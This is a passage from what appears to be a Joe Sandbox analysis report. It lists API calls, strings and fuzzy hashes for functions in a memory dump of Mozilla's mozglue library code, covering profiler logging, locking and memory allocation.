Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wdl$|Enabled
API String ID: 4142949111-4233065127
Opcode ID: 4b4bbc6ec98d7912e1363ae729becd7502d6704721c7ec4a1691f453cddbbb45
Instruction ID: f68e2e6ddda2c7e5dbe6038ec4adafee80b010b7fac99f9815ed82ed0419b561
Opcode Fuzzy Hash: 4b4bbc6ec98d7912e1363ae729becd7502d6704721c7ec4a1691f453cddbbb45
Instruction Fuzzy Hash: 57A1F3B0A002449FDB20CF69C4D07EEBBF1AF4A318F14885CD899AB741D735A945CBA9

Function 6C691D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C691D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C691BE3,?,?,6C691D96,00000000), ref: 6C691D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C691BE3,?,?,6C691D96,00000000), ref: 6C691D4C
GetCurrentThreadId.KERNEL32 ref: 6C691DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C691DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C691DDA

Part of subcall function 6C691EF0: GetCurrentThreadId.KERNEL32 ref: 6C691F03
Part of subcall function 6C691EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C691DF2,00000000,00000000), ref: 6C691F0C
Part of subcall function 6C691EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C691F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C691DF4

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 86261cc0e430928897d360e3e9353c7e77ac80e8d515cc6e68dc1f39e3a387fc
Instruction ID: d8053ef837ccc1f1549bce313614aa41798afb87c24a44ae9fe5d44b4b4a17fc
Opcode Fuzzy Hash: 86261cc0e430928897d360e3e9353c7e77ac80e8d515cc6e68dc1f39e3a387fc
Instruction Fuzzy Hash: 28417BB5200701AFCB10DF29C488A56BBF9FF89754F20442DE95A87B41CB71F954CB99

Function 6C6884E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6884F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C68850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C68851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C68855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C68856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6885AC

Part of subcall function 6C687670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6885B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C68767F
Part of subcall function 6C687670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6885B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C687693
Part of subcall function 6C687670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6885B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6876A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6885B2

Part of subcall function 6C665E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C665EDB
Part of subcall function 6C665E90: memset.VCRUNTIME140(ewjl,000000E5,?), ref: 6C665F27
Part of subcall function 6C665E90: LeaveCriticalSection.KERNEL32(?), ref: 6C665FB2

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 05ffb829bf90fd2359e147901c50e35dee22186a6e2dfee1cef9b4974426845c
Instruction ID: 1a53a5c34286006c32899e92be75b0f1456ddc9a122ecfdc8e52c8c786536fe0
Opcode Fuzzy Hash: 05ffb829bf90fd2359e147901c50e35dee22186a6e2dfee1cef9b4974426845c
Instruction Fuzzy Hash: 3C217C743016019FDB14DB29D888A5AB7B5BF8930CF24482DE55BC3B81DB31F949CB6A

Function 6C651640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C651699
VerSetConditionMask.NTDLL ref: 6C6516CB
VerSetConditionMask.NTDLL ref: 6C6516D7
VerSetConditionMask.NTDLL ref: 6C6516DE
VerSetConditionMask.NTDLL ref: 6C6516E5
VerSetConditionMask.NTDLL ref: 6C6516EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6516F9

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 3dc0830674fe7298dedde9582f17dad6f66132f0435f79d68d5a8e5636f64a96
Instruction ID: e5397d48eba4579c21ce10f2fd160044a2912fc069a17a45ad6560814306216a
Opcode Fuzzy Hash: 3dc0830674fe7298dedde9582f17dad6f66132f0435f79d68d5a8e5636f64a96
Instruction Fuzzy Hash: 9C21C3B07442486BEB105E659C85FBA727CDFC6704F404528F6059B1C0C6759E6487AA

Function 6C68F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C67CBE8: GetCurrentProcess.KERNEL32(?,6C6431A7), ref: 6C67CBF1
Part of subcall function 6C67CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6431A7), ref: 6C67CBFA

Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C654A68), ref: 6C68945E
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C689470
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C689482
Part of subcall function 6C689420: __Init_thread_footer.LIBCMT ref: 6C68949F

GetCurrentThreadId.KERNEL32 ref: 6C68F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C68F598), ref: 6C68F621

Part of subcall function 6C6894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6894EE
Part of subcall function 6C6894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C689508

GetCurrentThreadId.KERNEL32 ref: 6C68F637
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8,?,?,00000000,?,6C68F598), ref: 6C68F645
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8,?,?,00000000,?,6C68F598), ref: 6C68F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C68F62A

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 5f19ee51a592e1eaa7094d1558f282f318606368c6b2aeea25aa2e46eed9801f
Instruction ID: ed2ace0e82717e69cb393aa0464f9a5f40f928c8d9b96726dc061bcec0c8490e
Opcode Fuzzy Hash: 5f19ee51a592e1eaa7094d1558f282f318606368c6b2aeea25aa2e46eed9801f
Instruction Fuzzy Hash: 1F11C675302205ABCB04AF5AC8889E57779FFC676DF100415EA0687F42CB75A912CBBE

Function 6C6A76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C6A76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C6A7705

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6A7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C6A778F,00000000,00000000,00000000,00000000), ref: 6C6A7731
free.MOZGLUE(00000000), ref: 6C6A7760

Strings

}>hl, xrefs: 6C6A76C4

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>hl
API String ID: 2538299546-2143593243
Opcode ID: 5f6ea5dd9815b43527f18c696e38eb2fb372827bb0007134c5405a1337978dff
Instruction ID: b4e5a74df62939d08a2f0baa44a5b9747f128aa3035332326a884b68c634cc87
Opcode Fuzzy Hash: 5f6ea5dd9815b43527f18c696e38eb2fb372827bb0007134c5405a1337978dff
Instruction Fuzzy Hash: D311C4B29042156BE710AFBA9C44BABBEE8EF46354F144429F848E7300E7708D40CBE6

Function 6C650EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C67AB89: EnterCriticalSection.KERNEL32(6C6CE370,?,?,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284), ref: 6C67AB94
Part of subcall function 6C67AB89: LeaveCriticalSection.KERNEL32(6C6CE370,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C67ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C67D9F0,00000000), ref: 6C650F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C650F3C
__Init_thread_footer.LIBCMT ref: 6C650F50
FreeLibrary.KERNEL32(?,6C67D9F0,00000000), ref: 6C650F86

Strings

CoInitializeEx, xrefs: 6C650F36
combase.dll, xrefs: 6C650F18

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 8843f763485be077d38e4355829980c97b02410eda4677d6a2264fa5cfc3df6a
Instruction ID: f83685332b2f4c8c9d1c2b80a714f51b22feb413192689f27cb77a2efc7f1ce6
Opcode Fuzzy Hash: 8843f763485be077d38e4355829980c97b02410eda4677d6a2264fa5cfc3df6a
Instruction Fuzzy Hash: 3211C2743052409BDF00CF66C98CA8A3774EB9B72AF904229EE0593741D733E611CA6F

Function 6C68F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C654A68), ref: 6C68945E
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C689470
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C689482
Part of subcall function 6C689420: __Init_thread_footer.LIBCMT ref: 6C68949F

GetCurrentThreadId.KERNEL32 ref: 6C68F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C68F561

Part of subcall function 6C6894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6894EE
Part of subcall function 6C6894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C689508

GetCurrentThreadId.KERNEL32 ref: 6C68F577
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68F585
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68F5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C68F56A
[I %d/%d] profiler_resume, xrefs: 6C68F239
[I %d/%d] profiler_resume_sampling, xrefs: 6C68F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C68F3A8

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 0c60c1f2daf003148467012b13886a3636a6d278150176aa629ead106a0bbd52
Instruction ID: 526ae104898f529f283b404bdd3f3c1c35b3303c8ed8e33820a8c038022dce26
Opcode Fuzzy Hash: 0c60c1f2daf003148467012b13886a3636a6d278150176aa629ead106a0bbd52
Instruction Fuzzy Hash: BDF0E9767012009FDB006F66D88895A77BCEFCA69DF004411FA06C3702CB3549018B7F

Function 6C650E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C650DF8), ref: 6C650E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C650EA1
__Init_thread_footer.LIBCMT ref: 6C650EB5
FreeLibrary.KERNEL32 ref: 6C650EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C650E9B
kernel32.dll, xrefs: 6C650E7D

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 1c6a30aebe7f6a667147d65a14dc79787e6e257af1aae7bbb0a9c2f90d9653a5
Instruction ID: 6244495c2bc4d563b42268b49bc8d88c4a9ea7ccb02ba8223749239313a5e364
Opcode Fuzzy Hash: 1c6a30aebe7f6a667147d65a14dc79787e6e257af1aae7bbb0a9c2f90d9653a5
Instruction Fuzzy Hash: 3E0146747003818BDF009FAAE998A5233B5E74A718F200525EA0182B40D774E6368A6F

Function 6C68F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C654A68), ref: 6C68945E
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C689470
Part of subcall function 6C689420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C689482
Part of subcall function 6C689420: __Init_thread_footer.LIBCMT ref: 6C68949F

GetCurrentThreadId.KERNEL32 ref: 6C68F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C68F598), ref: 6C68F621

Part of subcall function 6C6894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6894EE
Part of subcall function 6C6894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C689508

GetCurrentThreadId.KERNEL32 ref: 6C68F637
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8,?,?,00000000,?,6C68F598), ref: 6C68F645
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8,?,?,00000000,?,6C68F598), ref: 6C68F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C68F62A

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: ae0b5c44f8d95e319920faaabf876c9ac55b8f7a1da040e5303663188326c8af
Instruction ID: 747673c2e9c035d3264c3924d8da6fc1dfe04fec109707817053ef6e19b1068e
Opcode Fuzzy Hash: ae0b5c44f8d95e319920faaabf876c9ac55b8f7a1da040e5303663188326c8af
Instruction Fuzzy Hash: 6DF08976301204AFDB006F66C88895A777DEFCA7ADF004415FA0683742CB755D068B7E

Function 6C6805F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C67CFAE,?,?,?,6C6431A7), ref: 6C6805FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C67CFAE,?,?,?,6C6431A7), ref: 6C680616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6431A7), ref: 6C68061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6431A7), ref: 6C680627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C68061B, 6C680625
<jemalloc>, xrefs: 6C6805FA, 6C68060F

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 1f292071b798d1fee8833fcf9a3a5f7352cf5e62394ace5eb457c4aaa65e885b
Instruction ID: 9c208421c66ec76e43d00956bd30a5fe9214f880698f5cabd6aedec399625fcd
Opcode Fuzzy Hash: 1f292071b798d1fee8833fcf9a3a5f7352cf5e62394ace5eb457c4aaa65e885b
Instruction Fuzzy Hash: DFE08CE2A0101037F6242256AC86DBB761CDBC6134F080039FE0E93301E95AAE2A52FA

Function 6C6505F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849be96f2ea9ad801197f03497d4c68bcad8d00f2b06ccd9524581dde73a3617
Instruction ID: 2e39ea19a387687625c44c19df4ec5a590822978700fa9ab740d8e53e49ae342
Opcode Fuzzy Hash: 849be96f2ea9ad801197f03497d4c68bcad8d00f2b06ccd9524581dde73a3617
Instruction Fuzzy Hash: EEA16AB0A01605CFDB24CF29C594A99FBF1FF49308F54866ED44A97B40E730AA55CF94

Function 6C6A14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6A14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6A14E2
GetCurrentThreadId.KERNEL32 ref: 6C6A1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6A15BA
free.MOZGLUE(?), ref: 6C6A16B4

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: e5046ebe709412b91a78a4e62489ae6bff1aee02650906d8f3fb652c650461d6
Instruction ID: 15ae236c7845a64fea8c23f59c60b22762acd2f8c4052ce74a5e380ad41d20a8
Opcode Fuzzy Hash: e5046ebe709412b91a78a4e62489ae6bff1aee02650906d8f3fb652c650461d6
Instruction Fuzzy Hash: 9E61F172A00700DBDB118F65C880BDEB7B4BF8A308F04951CED8A57712DB31E95ACB99

Function 6C69DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C69DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C69D38A,?), ref: 6C69DC6F
free.MOZGLUE(?,?,?,?,?,6C69D38A,?), ref: 6C69DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C69D38A,?), ref: 6C69DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C69D38A,?), ref: 6C69DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C69D38A,?), ref: 6C69DD4A

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 5186468b0fd18d265181915037552f9d3ed5384cf7e9639c92bb89a25410e083
Instruction ID: de36f5de12727c785e0ca5d2000a1042e096e76ed63817c93272025170cdb1be
Opcode Fuzzy Hash: 5186468b0fd18d265181915037552f9d3ed5384cf7e9639c92bb89a25410e083
Instruction Fuzzy Hash: 14417CB5A00206CFCF00CFA9C88099AB7F9FF89318B554569DA45ABB21D771FC15CB98

Function 6C67F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C67F480

Part of subcall function 6C64F100: LoadLibraryW.KERNEL32(shell32,?,6C6BD020), ref: 6C64F122
